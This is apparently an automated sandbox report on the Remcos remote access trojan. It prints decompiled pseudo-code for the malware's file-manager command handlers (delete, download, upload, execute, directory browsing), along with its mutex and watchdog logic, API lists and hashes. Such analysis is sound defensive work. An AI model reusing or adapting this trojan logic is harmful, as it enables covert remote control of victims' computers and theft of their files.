                                    					if(__eflags != 0) {
                                    						goto L6;
                                    					} else {
                                    						__eax =  *(__ecx + 2) & 0x000000ff;
                                    						__eflags = __al;
                                    						if(__eflags != 0) {
                                    							goto L6;
                                    						} else {
                                    							_push(__ecx);
                                    							_push(__ecx);
                                    							__ecx =  &_v700;
                                    							__eax = E006DD544( &_v700, __edx, __eflags, "license_code.txt", 2);
                                    							__ecx = 0x73c578;
                                    							__ecx = E006D1E49(0x73c578, __edx, __eflags, 0x34);
                                    							__edx = __eax;
                                    							__ecx =  &_v720;
                                    							__eax = E006DE8BB( &_v720, __edx, __eflags);
                                    							__ecx =  &_v720;
                                    							__eax = E006DD4F5( &_v720, __edx, __eflags);
                                    							__ecx =  &_v720;
                                    							L74();
                                    							__ecx =  &_v744;
                                    							E006D1FC7() = 0;
                                    							__eax = 1;
                                    							__eflags = 1;
                                    							L5:
                                    							return _t97;
                                    						}
                                    					}
                                    				}
                                     			}

                                    APIs
                                    • OpenMutexA.KERNEL32 ref: 006DC471
                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 006DC483
                                    • CloseHandle.KERNEL32(00000000), ref: 006DC48A
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 006DC4E9
                                    • GetLastError.KERNEL32 ref: 006DC4EF
                                    • GetModuleFileNameW.KERNEL32(00000000,0073BB08,00000104), ref: 006DC510
                                      • Part of subcall function 006DE8BB: __EH_prolog.LIBCMT ref: 006DE8C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                    • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Exe$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                    • API String ID: 1247502528-2513554630
                                    • Opcode ID: 6c05ddb9466eee6198be1ca9077488b9d19deb8e5e98653031aea7da9d79b51b
                                    • Instruction ID: 9c9e9e3c52346475c161a85107fac799350fd5b7d9745b8a93f8e8d1a0230256
                                    • Opcode Fuzzy Hash: 6c05ddb9466eee6198be1ca9077488b9d19deb8e5e98653031aea7da9d79b51b
                                    • Instruction Fuzzy Hash: E732C191F043457BEB9977715C27A7E26CB8B86710F14042FB542AF3D3EEA89D0183A9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 006E08A5
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 006E08C3
                                    • RegCloseKey.ADVAPI32(?), ref: 006E08CE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 92a075de183407693654a28d6b2757d8a70b83b69aa7568101ef7663f814f55e
                                    • Instruction ID: a959c7307b7beeb9d681207da06d2add40bb30a060aea27e325dccfec6f7be1b
                                    • Opcode Fuzzy Hash: 92a075de183407693654a28d6b2757d8a70b83b69aa7568101ef7663f814f55e
                                    • Instruction Fuzzy Hash: 81F01D7690020CBFEF209FA09C05FEEBBBDEB04710F1081A6FA04E6151D2795B559BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 81%
                                    			E006D697D(short* __edx, void* __eflags, intOrPtr _a4) {
                                    				char _v108;
                                    				void* _v112;
                                    				char _v132;
                                    				char _v136;
                                    				char _v140;
                                    				char _v152;
                                    				char _v156;
                                    				char _v160;
                                    				void* _v176;
                                    				char _v180;
                                    				char _v192;
                                    				void* _v204;
                                    				char _v208;
                                    				char _v212;
                                    				char _v216;
                                    				void* _v224;
                                    				char _v228;
                                    				char _v232;
                                    				char _v236;
                                    				char _v240;
                                    				char _v244;
                                    				void* _v248;
                                    				char _v252;
                                    				char _v256;
                                    				char _v260;
                                    				char _v264;
                                    				char _v268;
                                    				char _v272;
                                    				char _v276;
                                    				char _v280;
                                    				char _v284;
                                    				char _v288;
                                    				char _v292;
                                    				char _v296;
                                    				void* _v300;
                                    				void* _v308;
                                    				void* _v312;
                                    				char _v324;
                                    				char _v336;
                                    				char _v344;
                                    				char _v348;
                                    				char _v368;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed char _t160;
                                    				signed int _t162;
                                    				void* _t166;
                                    				void* _t171;
                                    				signed int _t172;
                                    				void* _t187;
                                    				void* _t202;
                                    				signed int _t204;
                                    				void* _t218;
                                    				int _t228;
                                    				void* _t235;
                                    				void* _t236;
                                    				void* _t249;
                                    				void* _t256;
                                    				signed int _t261;
                                    				void* _t265;
                                    				void* _t277;
                                    				short* _t288;
                                    				void* _t289;
                                    				void* _t300;
                                    				void* _t316;
                                    				void* _t326;
                                    				void* _t332;
                                    				void* _t334;
                                    				void* _t336;
                                    				void* _t340;
                                    				void* _t344;
                                    				void* _t354;
                                    				void* _t356;
                                    				void* _t377;
                                    				void* _t380;
                                    				void* _t542;
                                    				void* _t569;
                                    				intOrPtr _t574;
                                    				intOrPtr _t575;
                                    				signed int _t576;
                                    				signed int _t578;
                                    				signed int _t581;
                                    				void* _t588;
                                    				void* _t590;
                                    				void* _t592;
                                    				void* _t594;
                                    				void* _t596;
                                    				signed int _t597;
                                    				void* _t600;
                                    				void* _t601;
                                    				void* _t602;
                                    				void* _t603;
                                    				void* _t604;
                                    				void* _t605;
                                    				void* _t606;
                                    				void* _t609;
                                    				void* _t614;
                                    				void* _t615;
                                    				void* _t616;
                                    				void* _t618;
                                    				void* _t620;
                                    				void* _t639;
                                    				void* _t640;
                                    				void* _t641;
                                    				void* _t642;
                                    				void* _t645;
                                    				void* _t647;
                                    
                                    				_t646 = __eflags;
                                    				_t550 = __edx;
                                    				_push(_t356);
                                    				_t574 = _a4;
                                    				_push(_t569);
                                    				E006D20EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
                                    				SetEvent( *(_t574 + 0x34));
                                    				_t575 =  *((intOrPtr*)(E006D1F95( &_v160)));
                                    				E006D42A6( &_v160,  &_v136, 4, 0xffffffff);
                                    				_t600 = (_t597 & 0xfffffff8) - 0xec;
                                    				E006D20EC(0x73c238, _t600, _t550, _t646, 0x73c238);
                                    				_t601 = _t600 - 0x18;
                                    				E006D20EC(0x73c238, _t601, _t550, _t646,  &_v152);
                                    				E006E7478( &_v288, _t550);
                                    				_t602 = _t601 + 0x30;
                                    				_t647 = _t575 - 0x8b;
                                    				if(_t647 > 0) {
                                    					_t576 = _t575 - 0x8c;
                                    					__eflags = _t576;
                                    					if(__eflags == 0) {
                                    						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    						_t160 = GetFileAttributesW(E006D1EEB( &_v260));
                                    						__eflags = _t160 & 0x00000010;
                                    						if((_t160 & 0x00000010) == 0) {
                                    							_t162 = DeleteFileW(E006D1EEB( &_v260));
                                    						} else {
                                    							_t162 = E006E7754(E006D1EEB( &_v260));
                                    						}
                                    						__eflags = _t162;
                                    						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
                                    						if(__eflags == 0) {
                                    							_t603 = _t602 - 0x18;
                                    							E006E739C(0x73c238, _t603,  &_v252);
                                    							_push(0x55);
                                    							E006D4AA4(0x73c238, 0x73c2e8,  &_v252, __eflags);
                                    							_t166 = E006E733B( &_v208,  &_v280);
                                    							_t604 = _t603 - 0x18;
                                    							_t553 = "Unable to delete: ";
                                    							E006D75C2(0x73c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
                                    							_t605 = _t604 - 0x14;
                                    							_t377 = _t605;
                                    							_push("[ERROR]");
                                    						} else {
                                    							_t187 = E006E733B( &_v180,  &_v252);
                                    							_t609 = _t602 - 0x18;
                                    							_t553 = "Deleted file: ";
                                    							E006D75C2(0x73c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
                                    							_t605 = _t609 - 0x14;
                                    							_t377 = _t605;
                                    							_push("[Info]");
                                    						}
                                    						E006D2084(0x73c238, _t377);
                                    						E006E6C80(0x73c238, _t569);
                                    						_t606 = _t605 + 0x30;
                                    						E006D1FC7();
                                    						_t171 = E006D1E49( &_v288, _t553, __eflags, 1);
                                    						_t550 = "1";
                                    						_t380 = _t171;
                                    						_t172 = E006D5A6F("1");
                                    						__eflags = _t172;
                                    						if(_t172 == 0) {
                                    							L40:
                                    							E006D1EF0();
                                    							L41:
                                    							E006D1E74( &_v284, _t550);
                                    							E006D1FC7();
                                    							E006D1FC7();
                                    							return 0;
                                    						} else {
                                    							__eflags = E006D7323( &_v272, _t380, _t380) + 1;
                                    							E006D733F(E006D7323( &_v272, _t380, _t380) + 1);
                                    							_t550 =  &_v284;
                                    							E006D1EFA( &_v284,  &_v284, _t576, E006D2FFA(0x73c238,  &_v212,  &_v284, 0x2a));
                                    							E006D1EF0();
                                    							E006D427F(0x73c238, _t606 - 0x18, E006D1EEB( &_v288));
                                    							L39:
                                    							E006D61C3();
                                    							goto L40;
                                    						}
                                    					}
                                    					_t578 = _t576 - 1;
                                    					__eflags = _t578;
                                    					if(__eflags == 0) {
                                    						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    						E006D427F(0x73c238,  &_v216, E006D1F95(E006D1E49( &_v272, _t550, __eflags, 1)));
                                    						E006D7309( &_v276,  &_v252, 0, E006D7323( &_v268,  &_v216,  &_v216) + 1);
                                    						_t202 = E006D1EEB(E006D7629( &_v216,  &_v264,  &_v240));
                                    						_t204 = E00709924(E006D1EEB( &_v288), _t202);
                                    						asm("sbb bl, bl");
                                    						E006D1EF0();
                                    						_t361 =  ~_t204 + 1;
                                    						__eflags =  ~_t204 + 1;
                                    						if(__eflags == 0) {
                                    							_t550 = E006D75E6( &_v180, "Unable to rename file!", __eflags, 0x73c238);
                                    							E006D5343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
                                    							_push(0x59);
                                    							E006D4AA4(_t361, 0x73c2e8, _t206, __eflags);
                                    							E006D1FC7();
                                    						} else {
                                    							_t550 =  &_v228;
                                    							E006D7514(_t602 - 0x18,  &_v228, __eflags, "*");
                                    							E006D61C3();
                                    						}
                                    						E006D1EF0();
                                    						L13:
                                    						E006D1EF0();
                                    						goto L40;
                                    					}
                                    					_t581 = _t578 - 1;
                                    					__eflags = _t581;
                                    					if(__eflags == 0) {
                                    						E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    						_t218 = E006D1F95(E006D1E49( &_v272, _t550, __eflags, 1));
                                    						_t550 =  &_v264;
                                    						CreateDirectoryW(E006D1EEB(E006D7514( &_v192,  &_v264, __eflags, _t218)), 0);
                                    						E006D1EF0();
                                    						E006D3300(0x2a);
                                    						E006D7350(0x73c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
                                    						goto L39;
                                    					}
                                    					_t583 = _t581 - 3;
                                    					__eflags = _t581 - 3;
                                    					if(__eflags == 0) {
                                    						_t228 = StrToIntA(E006D1F95(E006D1E49( &_v264, _t550, __eflags, _t583)));
                                    						_t550 = E006D1F95(E006D1E49( &_v268, _t550, __eflags, 1));
                                    						E006E7F10(_t228, _t230);
                                    					}
                                    					goto L41;
                                    				}
                                    				if(_t647 == 0) {
                                    					E006D20D5(0x73c238,  &_v180);
                                    					E006D484E(0x73c238,  &_v108, 1);
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					asm("movsd");
                                    					E006D4A08(_t550);
                                    					_t235 = E006D1E49( &_v284, _t550, __eflags, 3);
                                    					_t614 = _t602 - 0xfffffffffffffff8;
                                    					_t236 = E006D1E49( &_v288, _t550, __eflags, 2);
                                    					E006D2F93(0x73c238, _t614, E006D2F93(0x73c238,  &_v236, E006D2F93(0x73c238,  &_v260, E006D2FB7( &_v284, E006D1E49( &_v292, _t550, __eflags, 1), 0x73c238), __eflags, _t236), __eflags, 0x73c238), __eflags, _t235);
                                    					E006D4AA4(0x73c238,  &_v140, _t240, __eflags);
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					E006D427F(0x73c238,  &_v292, E006D1F95(E006D1E49( &_v324, _t240, __eflags, 0)));
                                    					_t249 = E006E733B( &_v272,  &_v296);
                                    					_t615 = _t614 - 0x18;
                                    					E006D75C2(0x73c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
                                    					_t616 = _t615 - 0x14;
                                    					E006D2084(0x73c238, _t616, "[Info]");
                                    					E006E6C80(0x73c238, "[Info]");
                                    					E006D1FC7();
                                    					E006D1EF0();
                                    					_t256 = E006D1F95(E006D1E49( &_v336, "Downloading file: ", __eflags, 0));
                                    					_t618 = _t616 + 0x30 - 0x18;
                                    					E006D427F(0x73c238, _t618, _t256);
                                    					_t261 = E006D62D8( &_v192, __eflags, E007098A0(_t258, E006D1F95(E006D1E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                                    					_t620 = _t618 + 0x2c;
                                    					_push(0);
                                    					__eflags = _t261;
                                    					if(__eflags == 0) {
                                    						E006D427F(0x73c238,  &_v264, E006D1F95(E006D1E49( &_v348, "Downloading file: ", __eflags)));
                                    						_t265 = E006E733B( &_v244,  &_v268);
                                    						_t550 = "Failed to download file: ";
                                    						E006D75C2(0x73c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
                                    						E006D2084(0x73c238, _t620 - 4, "[ERROR]");
                                    						E006E6C80(0x73c238, "[Info]");
                                    						E006D1FC7();
                                    						E006D1EF0();
                                    					} else {
                                    						E006D427F(0x73c238,  &_v264, E006D1F95(E006D1E49( &_v348, "Downloading file: ", __eflags)));
                                    						_t277 = E006E733B( &_v244,  &_v268);
                                    						_t550 = "Downloaded file: ";
                                    						E006D75C2(0x73c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
                                    						E006D2084(0x73c238, _t620 - 4, "[Info]");
                                    						E006E6C80(0x73c238, "[Info]");
                                    						E006D1FC7();
                                    						E006D1EF0();
                                    						E006D2084(0x73c238, _t620 - 4 + 0x30 - 0x18, 0x72f6bc);
                                    						_push(0x58);
                                    						E006D4AA4(0x73c238,  &_v156, "Downloaded file: ", __eflags);
                                    					}
                                    					E006D4E0B( &_v140);
                                    					E006D4E2F(0x73c238,  &_v140, 0);
                                    					L15:
                                    					E006D1FC7();
                                    					goto L41;
                                    				}
                                    				_t588 = _t575 - 0x61;
                                    				if(_t588 == 0) {
                                    					E006D427F(0x73c238, _t602 - 0x18, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    					_t288 = E006D1E49( &_v272, _t550, __eflags, 2);
                                    					_t289 = E006D1E49( &_v276, _t550, __eflags, 1);
                                    					_t550 = _t288;
                                    					E006E69CC(_t289, _t288);
                                    					goto L41;
                                    				}
                                    				_t590 = _t588 - 0x26;
                                    				if(_t590 == 0) {
                                    					GetLogicalDriveStringsA(0x64,  &_v108);
                                    					E006D20AB(0x73c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
                                    					__eflags = E006D7397( &_v260, 0x72f860, 0, 2) + 1;
                                    					E006D1F84(E006D7397( &_v260, 0x72f860, 0, 2) + 1);
                                    					E006D20EC(0x73c238, _t602 - 0x18, _t550, E006D7397( &_v260, 0x72f860, 0, 2) + 1,  &_v276);
                                    					_t300 = E006D6406(0x73c238,  &_v256);
                                    					_t550 = E006D2FB7( &_v232,  &_v280, 0x73c238);
                                    					E006D2F1D(_t602 - 0x18, _t301, _t300);
                                    					_push(0x51);
                                    					E006D4AA4(0x73c238, 0x73c2e8, _t301, __eflags);
                                    					E006D1FC7();
                                    					E006D1FC7();
                                    					goto L15;
                                    				}
                                    				_t592 = _t590 - 1;
                                    				if(_t592 == 0) {
                                    					E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    					E006D7350(0x73c238, _t602 - 0x18, _t550, __eflags,  &_v260);
                                    					E006D61C3();
                                    					__eflags = E006D2489() - 2;
                                    					_t316 = E006E733B( &_v228, E006D7309( &_v264,  &_v240, 0, E006D2489() - 2));
                                    					_t550 = "Browsing directory: ";
                                    					E006D75C2(0x73c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E006D2489() - 2, _t316);
                                    					E006D2084(0x73c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
                                    					E006E6C80(0x73c238, _t569);
                                    					E006D1FC7();
                                    					goto L13;
                                    				}
                                    				_t594 = _t592 - 1;
                                    				if(_t594 == 0) {
                                    					E006D427F(0x73c238,  &_v256, E006D1F95(E006D1E49( &_v264, _t550, __eflags, 0)));
                                    					ShellExecuteW(0, L"open", E006D1EEB( &_v260), 0, 0, 1);
                                    					_t326 = E006E733B( &_v212,  &_v260);
                                    					_t550 = "Executing file: ";
                                    					E006D75C2(0x73c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
                                    					E006D2084(0x73c238, _t602 - 4, "[Info]");
                                    					E006E6C80(0x73c238, _t569);
                                    					E006D1FC7();
                                    					goto L40;
                                    				} else {
                                    					_t596 = _t594 - 1;
                                    					_t652 = _t596;
                                    					if(_t596 == 0) {
                                    						E006D72F6( &_v108);
                                    						_t332 = E006D1E49( &_v264, _t550, _t652, 3);
                                    						_t639 = _t602 - 0x18;
                                    						E006D20EC(0x73c238, _t639, _t550, _t652, _t332);
                                    						_t334 = E006D1E49( &_v272, _t550, _t652, 2);
                                    						_t640 = _t639 - 0x18;
                                    						E006D20EC(0x73c238, _t640, _t550, _t652, _t334);
                                    						_t336 = E006D1E49( &_v280, _t550, _t652, 1);
                                    						_t641 = _t640 - 0x18;
                                    						E006D20EC(0x73c238, _t641, _t550, _t652, _t336);
                                    						_push(E006D1F95(E006D1E49( &_v288, _t550, _t652, _t596)));
                                    						_t340 = E006D64A2( &_v136, _t550);
                                    						_push(_t596);
                                    						_t653 = _t340;
                                    						if(_t340 == 0) {
                                    							E006D427F(0x73c238,  &_v252, E006D1F95(E006D1E49( &_v368, _t550, __eflags)));
                                    							_t344 = E006E733B( &_v232,  &_v256);
                                    							_t642 = _t641 - 0x18;
                                    							_t550 = "Failed to upload file: ";
                                    							E006D75C2(0x73c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
                                    							_t542 = _t642 - 0x14;
                                    							_push("[ERROR]");
                                    						} else {
                                    							E006D427F(0x73c238,  &_v252, E006D1F95(E006D1E49( &_v368, _t550, _t653)));
                                    							_t354 = E006E733B( &_v232,  &_v256);
                                    							_t645 = _t641 - 0x18;
                                    							_t550 = "Uploaded file: ";
                                    							E006D75C2(0x73c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
                                    							_t542 = _t645 - 0x14;
                                    							_push("[Info]");
                                    						}
                                    						E006D2084(0x73c238, _t542);
                                    						E006E6C80(0x73c238, _t569);
                                    						E006D1FC7();
                                    						E006D1EF0();
                                    						L006D7304(0x73c238,  &_v132, _t596);
                                    					}
                                    					goto L41;
                                    				}
			}

                                    0x006d697d
                                    0x006d697d
                                    0x006d698d
                                    0x006d698f
                                    0x006d6992
                                    0x006d6997
                                    0x006d699f
                                    0x006d69b9
                                    0x006d69c3
                                    0x006d69c8
                                    0x006d69d3
                                    0x006d69d8
                                    0x006d69e5
                                    0x006d69ee
                                    0x006d69f8
                                    0x006d69fb
                                    0x006d69fd
                                    0x006d6fad
                                    0x006d6fad
                                    0x006d6fb3
                                    0x006d7198
                                    0x006d71a7
                                    0x006d71b1
                                    0x006d71b3
                                    0x006d71c9
                                    0x006d71b5
                                    0x006d71bc
                                    0x006d71bc
                                    0x006d71cf
                                    0x006d71d8
                                    0x006d71da
                                    0x006d7201
                                    0x006d7206
                                    0x006d720b
                                    0x006d7212
                                    0x006d721f
                                    0x006d7224
                                    0x006d7227
                                    0x006d722f
                                    0x006d7234
                                    0x006d7237
                                    0x006d7239
                                    0x006d71dc
                                    0x006d71e0
                                    0x006d71e5
                                    0x006d71e8
                                    0x006d71f0
                                    0x006d71f5
                                    0x006d71f8
                                    0x006d71fa
                                    0x006d71fa
                                    0x006d723e
                                    0x006d7243
                                    0x006d7248
                                    0x006d724f
                                    0x006d725a
                                    0x006d725f
                                    0x006d7264
                                    0x006d7266
                                    0x006d726b
                                    0x006d726d
                                    0x006d72c4
                                    0x006d72c8
                                    0x006d72cd
                                    0x006d72d1
                                    0x006d72dd
                                    0x006d72e6
                                    0x006d72f3
                                    0x006d726f
                                    0x006d727a
                                    0x006d7280
                                    0x006d7287
                                    0x006d729a
                                    0x006d72a3
                                    0x006d72b7
                                    0x006d72bc
                                    0x006d72bc
                                    0x00000000
                                    0x006d72c1
                                    0x006d726d
                                    0x006d6fb9
                                    0x006d6fb9
                                    0x006d6fbc
                                    0x006d7097
                                    0x006d70b3
                                    0x006d70cf
                                    0x006d70e9
                                    0x006d70f9
                                    0x006d7108
                                    0x006d710a
                                    0x006d710f
                                    0x006d710f
                                    0x006d7112
                                    0x006d7150
                                    0x006d7154
                                    0x006d715a
                                    0x006d7161
                                    0x006d716a
                                    0x006d7114
                                    0x006d7117
                                    0x006d7122
                                    0x006d7128
                                    0x006d712d
                                    0x006d7173
                                    0x006d6c5f
                                    0x006d6c5f
                                    0x00000000
                                    0x006d6c5f
                                    0x006d6fc2
                                    0x006d6fc2
                                    0x006d6fc5
                                    0x006d7022
                                    0x006d7035
                                    0x006d703b
                                    0x006d7051
                                    0x006d705b
                                    0x006d7066
                                    0x006d7075
                                    0x00000000
                                    0x006d7075
                                    0x006d6fc7
                                    0x006d6fc7
                                    0x006d6fca
                                    0x006d6fe2
                                    0x006d6ffc
                                    0x006d7000
                                    0x006d7000
                                    0x00000000
                                    0x006d6fca
                                    0x006d6a03
                                    0x006d6d53
                                    0x006d6d61
                                    0x006d6d77
                                    0x006d6d78
                                    0x006d6d79
                                    0x006d6d7a
                                    0x006d6d7b
                                    0x006d6d86
                                    0x006d6d8b
                                    0x006d6d98
                                    0x006d6dd2
                                    0x006d6de1
                                    0x006d6dea
                                    0x006d6df3
                                    0x006d6dfc
                                    0x006d6e19
                                    0x006d6e26
                                    0x006d6e2b
                                    0x006d6e36
                                    0x006d6e3b
                                    0x006d6e46
                                    0x006d6e4b
                                    0x006d6e57
                                    0x006d6e60
                                    0x006d6e71
                                    0x006d6e76
                                    0x006d6e7c
                                    0x006d6ea8
                                    0x006d6ead
                                    0x006d6eb4
                                    0x006d6eb5
                                    0x006d6eb7
                                    0x006d6f41
                                    0x006d6f4e
                                    0x006d6f56
                                    0x006d6f5e
                                    0x006d6f6d
                                    0x006d6f72
                                    0x006d6f7e
                                    0x006d6f87
                                    0x006d6eb9
                                    0x006d6eca
                                    0x006d6ed7
                                    0x006d6edf
                                    0x006d6ee7
                                    0x006d6ef2
                                    0x006d6ef7
                                    0x006d6f03
                                    0x006d6f0c
                                    0x006d6f1b
                                    0x006d6f20
                                    0x006d6f29
                                    0x006d6f29
                                    0x006d6f93
                                    0x006d6f9f
                                    0x006d6cff
                                    0x006d6cff
                                    0x00000000
                                    0x006d6cff
                                    0x006d6a09
                                    0x006d6a0c
                                    0x006d6d21
                                    0x006d6d2c
                                    0x006d6d39
                                    0x006d6d3e
                                    0x006d6d42
                                    0x00000000
                                    0x006d6d47
                                    0x006d6a12
                                    0x006d6a15
                                    0x006d6c73
                                    0x006d6c87
                                    0x006d6c9e
                                    0x006d6ca4
                                    0x006d6cb3
                                    0x006d6cbc
                                    0x006d6cd3
                                    0x006d6cd7
                                    0x006d6cdd
                                    0x006d6ce4
                                    0x006d6ced
                                    0x006d6cf6
                                    0x00000000
                                    0x006d6cfb
                                    0x006d6a1b
                                    0x006d6a1e
                                    0x006d6be8
                                    0x006d6bf7
                                    0x006d6bfc
                                    0x006d6c0d
                                    0x006d6c26
                                    0x006d6c2e
                                    0x006d6c36
                                    0x006d6c45
                                    0x006d6c4a
                                    0x006d6c56
                                    0x00000000
                                    0x006d6c5b
                                    0x006d6a24
                                    0x006d6a27
                                    0x006d6b6f
                                    0x006d6b88
                                    0x006d6b96
                                    0x006d6b9e
                                    0x006d6ba6
                                    0x006d6bb5
                                    0x006d6bba
                                    0x006d6bc6
                                    0x00000000
                                    0x006d6a2d
                                    0x006d6a2d
                                    0x006d6a2d
                                    0x006d6a30
                                    0x006d6a3d
                                    0x006d6a48
                                    0x006d6a4d
                                    0x006d6a53
                                    0x006d6a5e
                                    0x006d6a63
                                    0x006d6a69
                                    0x006d6a74
                                    0x006d6a79
                                    0x006d6a7f
                                    0x006d6a95
                                    0x006d6a9d
                                    0x006d6aa6
                                    0x006d6aa7
                                    0x006d6aa9
                                    0x006d6afb
                                    0x006d6b08
                                    0x006d6b0d
                                    0x006d6b10
                                    0x006d6b18
                                    0x006d6b20
                                    0x006d6b22
                                    0x006d6aab
                                    0x006d6abc
                                    0x006d6ac9
                                    0x006d6ace
                                    0x006d6ad1
                                    0x006d6ad9
                                    0x006d6ae1
                                    0x006d6ae3
                                    0x006d6ae3
                                    0x006d6b27
                                    0x006d6b2c
                                    0x006d6b38
                                    0x006d6b41
                                    0x006d6b4d
                                    0x006d6b4d
                                    0x00000000
                                    0x006d6a30

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 006D699F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 006D6B88
                                      • Part of subcall function 006D64A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006D64ED
                                      • Part of subcall function 006D62D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 006D6331
                                      • Part of subcall function 006D62D8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 006D6379
                                      • Part of subcall function 006D62D8: CloseHandle.KERNEL32(00000000), ref: 006D63B3
                                      • Part of subcall function 006D62D8: MoveFileW.KERNEL32(00000000,00000000), ref: 006D63CB
                                      • Part of subcall function 006E6C80: GetLocalTime.KERNEL32(00000000), ref: 006E6C9A
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                      • Part of subcall function 006D7514: char_traits.LIBCPMT ref: 006D752F
                                    • GetLogicalDriveStringsA.KERNEL32 ref: 006D6C73
                                    • StrToIntA.SHLWAPI(00000000,?), ref: 006D6FE2
                                    • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 006D7051
                                      • Part of subcall function 006D61C3: FindFirstFileW.KERNEL32(00000000,?), ref: 006D61DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
• Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                                    • API String ID: 4189642951-1986272625
                                    • Opcode ID: 9e7b3e93434ad678ce09fa0584ec95d750407149775d47cf25e9e3801a3501ad
                                    • Instruction ID: 00046d5efb4415f55763643f3600f0851f6e7bbe430197b0fde0ac0b83abb88d
                                    • Opcode Fuzzy Hash: 9e7b3e93434ad678ce09fa0584ec95d750407149775d47cf25e9e3801a3501ad
                                    • Instruction Fuzzy Hash: 42328771E083416BC684FB75D8679AF77A79F95300F40092EF4425B392EE709A09C79B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E006DFAC7(void* __eflags) {
                                    				char _v28;
                                    				char _v36;
                                    				void* _v40;
                                    				char _v56;
                                    				void* _v64;
                                    				char _v76;
                                    				char _v84;
                                    				void* _v88;
                                    				char _v100;
                                    				char _v104;
                                    				void* _v108;
                                    				char _v124;
                                    				char _v128;
                                    				long _v132;
                                    				char _v148;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				long _t26;
                                    				void* _t29;
                                    				void* _t35;
                                    				void* _t46;
                                    				void* _t61;
                                    				void* _t78;
                                    				void* _t107;
                                    				long _t112;
                                    				long _t141;
                                    				void* _t142;
                                    				CHAR* _t143;
                                    				void* _t145;
                                    				signed int _t147;
                                    				void* _t149;
                                    				void* _t155;
                                    
                                    				_t149 = (_t147 & 0xfffffff8) - 0x7c;
                                    				_push(_t142);
                                    				_t26 = GetCurrentProcessId();
                                    				if(E006E0BB0(0x73c518, E006D1F95(0x73c518), "WD", _t26) != 0) {
                                    					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
                                    					__eflags = _t29;
                                    					if(_t29 == 0) {
                                    						E006D20D5(0x73c518,  &_v100);
                                    						E006E79DC(E006D1EEB(0x73c500),  &_v100);
                                    						E006D1F6D(0x73c518,  &_v124);
                                    						__eflags = E006E7614( &_v124);
                                    						if(__eflags != 0) {
